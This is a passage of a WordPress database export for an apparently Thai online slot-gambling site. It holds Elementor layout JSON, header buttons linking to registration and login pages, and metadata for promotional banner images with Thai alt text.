0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1489,178,'_thumbnail_id','61'),(1541,183,'_elementor_source','post'),(1542,183,'_elementor_edit_mode','builder'),(1543,183,'_elementor_template_type','header'),(1544,183,'_elementor_version','3.32.5'),(1545,183,'_elementor_pro_version','3.32.3'),(1546,183,'_wp_page_template','default'),(1547,183,'_elementor_data','[{\"id\":\"2a37657\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"50\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#530707\",\"background_color_b\":\"#140106\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"#FBFBFB\"}},\"elements\":[{\"id\":\"f229e82\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":14.7859999999999995878852132591418921947479248046875,\"_inline_size_mobile\":80},\"elements\":[{\"id\":\"265c642\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false},{\"id\":\"43121f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":48.546999999999997044142219237983226776123046875,\"_inline_size_tablet\":20,\"_inline_size_mobile\":20},\"elements\":[{\"id\":\"ece9e44\",\"elType\":\"widget\",\"settings\":{\"menu_name\":\"Menu\",\"menu\":\"main-menu\",\"full_width\":\"stretch\",\"color_dropdown_item\":\"#FFFFFF\",\"background_color_dropdown_item\":\"#000000\",\"background_color_dropdown_item_hover\":\"#FFFFFFBA\",\"toggle_color\":\"#FFFFFF\",\"toggle_size_mobile\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false},{\"id\":\"4603d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":13.419000000000000483169060316868126392364501953125,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"469ae70\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\",\"link\":{\"url\":\"https:\\/\\/megabet333auto.net\\/auth\\/register\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"hover_animation\":\"shrink\",\"button_text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f2a695b\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.8800000000000007815970093361102044582366943359375,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"bb7db24\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\",\"link\":{\"url\":\"megabet333auto.net\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#A30808\",\"background_color\":\"#FFFFFF\",\"button_background_hover_color\":\"#FFFFFF\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f85ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.3510000000000008668621376273222267627716064453125,\"_inline_size_tablet\":18},\"elements\":[{\"id\":\"5958e0a\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32\",\"link\":{\"url\":\"mgbline.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#FFFFFF\",\"background_color\":\"#056704\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(1548,183,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(1585,186,'_wp_attached_file','2026/01/1-spin-slot-free-demo-Megabet333-Biz.webp'),(1586,186,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:49:\"2026/01/1-spin-slot-free-demo-Megabet333-Biz.webp\";s:8:\"filesize\";i:78594;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"1-spin-slot-free-demo-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11506;}s:5:\"large\";a:5:{s:4:\"file\";s:50:\"1-spin-slot-free-demo-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:58404;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"1-spin-slot-free-demo-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6552;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"1-spin-slot-free-demo-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:41026;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1587,186,'_wp_attachment_image_alt','ปั่น สล็อต ฟรี ทดลอง'),(1598,189,'_wp_attached_file','2026/01/2-Latest-free-credit-no-sharing-required-Megabet333-Biz.webp'),(1599,189,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:68:\"2026/01/2-Latest-free-credit-no-sharing-required-Megabet333-Biz.webp\";s:8:\"filesize\";i:79402;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"2-Latest-free-credit-no-sharing-required-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11562;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"2-Latest-free-credit-no-sharing-required-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:58672;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"2-Latest-free-credit-no-sharing-required-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6988;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"2-Latest-free-credit-no-sharing-required-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:41446;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1600,189,'_wp_attachment_image_alt','เครดิต ฟรี ล่าสุด ไม่ ต้อง แชร์'),(1611,192,'_wp_attached_file','2026/01/3-Demo-play-slot-free-88-Megabet333-Biz.webp'),(1612,192,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:52:\"2026/01/3-Demo-play-slot-free-88-Megabet333-Biz.webp\";s:8:\"filesize\";i:85836;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"3-Demo-play-slot-free-88-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12102;}s:5:\"large\";a:5:{s:4:\"file\";s:53:\"3-Demo-play-slot-free-88-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:63120;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"3-Demo-play-slot-free-88-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6946;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"3-Demo-play-slot-free-88-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:44026;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1613,192,'_wp_attachment_image_alt','ทดลอง เล่น สล็อต ฟรี 88'),(1639,202,'_wp_attached_file','2026/01/8-Slot-easy-jackpot-Megabet333-Biz.webp'),(1640,202,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:47:\"2026/01/8-Slot-easy-jackpot-Megabet333-Biz.webp\";s:8:\"filesize\";i:89692;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"8-Slot-easy-jackpot-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12182;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"8-Slot-easy-jackpot-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:66824;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"8-Slot-easy-jackpot-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6648;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"8-Slot-easy-jackpot-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:45296;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1641,202,'_wp_attachment_image_alt','สล็อต แตก ง่าย จ่าย หนัก'),(1653,205,'_wp_attached_file','2026/01/9-Slot-no1-Megabet333-Biz.webp'),(1654,205,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:38:\"2026/01/9-Slot-no1-Megabet333-Biz.webp\";s:8:\"filesize\";i:81438;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"9-Slot-no1-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11486;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"9-Slot-no1-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:59994;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"9-Slot-no1-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6024;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"9-Slot-no1-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:42462;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1655,205,'_wp_attachment_image_alt','เว็บ สล็อต แตก ง่าย อันดับ 1'),(1671,212,'_wp_attached_file','2026/01/12-No-minimum-amount-starting-from-just-1-baht-Megabet333-Biz.webp'),(1672,212,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:74:\"2026/01/12-No-minimum-amount-starting-from-just-1-baht-Megabet333-Biz.webp\";s:8:\"filesize\";i:83274;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:74:\"12-No-minimum-amount-starting-from-just-1-baht-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12262;}s:5:\"large\";a:5:{s:4:\"file\";s:75:\"12-No-minimum-amount-starting-from-just-1-baht-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:61624;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:74:\"12-No-minimum-amount-starting-from-just-1-baht-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6578;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:74:\"12-No-minimum-amount-starting-from-just-1-baht-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:43504;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1673,212,'_wp_attachment_image_alt','สล็อตแตกง่าย ไม่มีขั้นต่ำ'),(1686,216,'_wp_attached_file','2026/01/13-Direct-slot-website-Megabet333-Biz.webp'),(1687,216,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:50:\"2026/01/13-Direct-slot-website-Megabet333-Biz.webp\";s:8:\"filesize\";i:84184;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"13-Direct-slot-website-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11994;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"13-Direct-slot-website-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:61972;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"13-Direct-slot-website-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6384;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"13-Direct-slot-website-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:43686;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1688,216,'_wp_attachment_image_alt','สล็อตเว็บตรง'),(1706,222,'_wp_attached_file','2026/01/15-Direct-slot-website-100-Megabet333-Biz.webp'),(1707,222,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:54:\"2026/01/15-Direct-slot-website-100-Megabet333-Biz.webp\";s:8:\"filesize\";i:85204;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"15-Direct-slot-website-100-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12448;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"15-Direct-slot-website-100-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:63648;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"15-Direct-slot-website-100-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7126;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"15-Direct-slot-website-100-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:44614;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1708,222,'_wp_attachment_image_alt','สล็อตเว็บตรง 100 ต่างประเทศ'),(1721,226,'_wp_attached_file','2026/01/16-Pro-slot-Megabet333-Biz.webp'),(1722,226,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:39:\"2026/01/16-Pro-slot-Megabet333-Biz.webp\";s:8:\"filesize\";i:75404;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"16-Pro-slot-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10928;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"16-Pro-slot-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:55152;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"16-Pro-slot-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6832;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"16-Pro-slot-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:39716;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1723,226,'_wp_attachment_image_alt','ปัน โปร สล็อต'),(1736,230,'_wp_attached_file','2026/01/17-Slot-games-buy-free-spins-demo-play-Megabet333-Biz.webp'),(1737,230,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:66:\"2026/01/17-Slot-games-buy-free-spins-demo-play-Megabet333-Biz.webp\";s:8:\"filesize\";i:87064;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"17-Slot-games-buy-free-spins-demo-play-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12256;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"17-Slot-games-buy-free-spins-demo-play-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:65288;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"17-Slot-games-buy-free-spins-demo-play-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7512;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"17-Slot-games-buy-free-spins-demo-play-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:45350;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1738,230,'_wp_attachment_image_alt','สล็อต ซื้อ ฟรี ส ปิ น ทดลองเล่น'),(1757,238,'_wp_attached_file','2026/01/19-Spin-slot-free-demo-Megabet333-Biz.webp'),(1758,238,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:50:\"2026/01/19-Spin-slot-free-demo-Megabet333-Biz.webp\";s:8:\"filesize\";i:91482;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"19-Spin-slot-free-demo-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12656;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"19-Spin-slot-free-demo-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:68058;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"19-Spin-slot-free-demo-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6936;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"19-Spin-slot-free-demo-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:46688;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1759,238,'_wp_attachment_image_alt','ปั่น สล็อต ฟรี 